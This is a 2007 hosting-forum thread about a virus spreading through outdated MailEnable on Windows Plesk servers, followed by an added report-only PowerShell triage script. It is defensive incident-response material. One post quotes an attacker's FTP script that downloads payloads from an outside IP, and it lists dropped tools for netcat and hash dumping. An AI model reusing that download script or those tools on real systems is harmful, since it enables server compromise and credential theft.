Virus Alert!
DavidP
02-24-2007, 07:53 PM
There is currently a virus affecting Windows Plesk servers online. The point of infection seems to be Mailenable, and SWSoft is aware of it, and has confirmed that it is a known issue not limited to PowerVPS.
At this time, there is no known solution, but SWSoft is working on it. We do not yet have a solution, but if your VPS is infected we can rebuild it for you to remove the virus. We recommend backing up all of your data asap if you are on an MSVS or Virtuozzo for Windows VPS running Plesk and Mailenable.
Robert
02-24-2007, 08:47 PM
At this time, we're recommending that anyone with Plesk for Windows DISABLE MAILENABLE until further notice.
Milovan
02-25-2007, 07:52 AM
Here is what we believe happened here (we have not heard anything from SWSoft officially yet).
Any server using MailEnable 1.95 or lower is potentially at risk.
If you happen to experience anything strange with your box, yet you are still able to RDP in, make sure to disable MailEnable SMTP Relay Service. Once you disable it, you should be able to get rdriv.sys cleaned up. This particular service is not part of MailEnable and while it's running you will not be able to remove rdriv.sys. You may also want to search for the following binaries:
C:\windows\system32\a.exe
C:\windows\system32\bot.exe
C:\windows\system32\bw.exe
C:\windows\system32\gethashes.exe
C:\windows\system32\getsyskey.exe
C:\windows\system32\nc.exe
C:\windows\system32\rdriv.sys
C:\windows\system32\start.bat
You may also come across C:\windows\system32\script1.txt which contains:
open 80.34.174.156 21
user anonymous
anonymous@on.the.net
lcd c:\windows\system32
get explorer.exe
get runservice_bis.dll
get kill.exe
get fport.exe
get hyberport.exe
get JASFV.INI
bye
Again - if you have a Windows 2003 Server machine (dedicated/VPS), and are using MailEnable which is not up to date, get a copy of the latest versions at http://mailenable.com/download.asp and apply them ASAP. Then go through the box and verify the above.
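As an added triage example (not posted by anyone in this thread), the PowerShell below checks a host for the indicators Milovan listed: the eight file paths, the script1.txt FTP script with its 80.34.174.156 host, and any service whose display name mentions MailEnable, flagging the "Relay" one he says is not a genuine MailEnable component. It only reports and hashes what it finds; it does not stop services or delete files, so the output can be kept as evidence before a rebuild. It assumes PowerShell 4 or later for Get-FileHash and that it is run elevated; the service-name pattern is an assumption, since the post gives only the display name "MailEnable SMTP Relay Service".

```powershell
# Added example: report-only triage for the indicators quoted in this thread.
# Assumes PowerShell 4+ (Get-FileHash) and an elevated session. Nothing is removed.

# File indicators exactly as listed in the post above.
$iocFiles = @(
    'C:\windows\system32\a.exe',
    'C:\windows\system32\bot.exe',
    'C:\windows\system32\bw.exe',
    'C:\windows\system32\gethashes.exe',
    'C:\windows\system32\getsyskey.exe',
    'C:\windows\system32\nc.exe',
    'C:\windows\system32\rdriv.sys',
    'C:\windows\system32\start.bat'
)
$ftpScript = 'C:\windows\system32\script1.txt'
$ftpHost   = '80.34.174.156'   # host named in the quoted script1.txt contents

$findings = New-Object System.Collections.Generic.List[object]

# 1. Dropped binaries: record size, timestamp and SHA256 for each one present.
foreach ($path in $iocFiles) {
    if (Test-Path -LiteralPath $path) {
        $item = Get-Item -LiteralPath $path -Force
        $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        $findings.Add([pscustomobject]@{
            Indicator = 'file'
            Detail    = $path
            Size      = $item.Length
            LastWrite = $item.LastWriteTime
            SHA256    = $hash
        })
    }
}

# 2. The FTP download script: flag it, and note whether it still points at the
#    host from the thread (the attacker could have rotated it).
if (Test-Path -LiteralPath $ftpScript) {
    $content   = Get-Content -LiteralPath $ftpScript -Raw
    $sameHost  = $content -match [regex]::Escape($ftpHost)
    $findings.Add([pscustomobject]@{
        Indicator = 'ftp-script'
        Detail    = if ($sameHost) { "$ftpScript (contacts $ftpHost)" }
                    else           { "$ftpScript (different host, review contents)" }
        Size      = (Get-Item -LiteralPath $ftpScript -Force).Length
        LastWrite = (Get-Item -LiteralPath $ftpScript -Force).LastWriteTime
        SHA256    = (Get-FileHash -LiteralPath $ftpScript -Algorithm SHA256).Hash
    })
}

# 3. Services: list everything branded MailEnable so a bogus "Relay" entry stands
#    out next to the real connectors. Display-name match is an assumption.
Get-Service | Where-Object { $_.DisplayName -like '*MailEnable*' } | ForEach-Object {
    $suspect = $_.DisplayName -like '*Relay*'
    $findings.Add([pscustomobject]@{
        Indicator = if ($suspect) { 'service-SUSPECT' } else { 'service' }
        Detail    = "$($_.Name) [$($_.DisplayName)] status=$($_.Status)"
        Size      = $null
        LastWrite = $null
        SHA256    = $null
    })
}

# 4. Report. Keep the CSV off the suspect box if you can (e.g. a share), since a
#    rebuild is the recommended fix and local evidence goes with it.
if ($findings.Count -eq 0) {
    Write-Output 'No listed indicators found on this host.'
} else {
    $findings | Format-Table -AutoSize
    $findings | Export-Csv -NoTypeInformation -Path "$env:TEMP\plesk-mailenable-triage.csv"
}
```

Read "no indicators found" cautiously: the post itself says rdriv.sys cannot be removed while that service runs, so a driver that is still loaded can interfere with what a live scan sees. Run the check again after disabling the service as Milovan describes, and treat the hashes as the starting point for confirming with your AV vendor or SWSoft rather than as a clean bill of health.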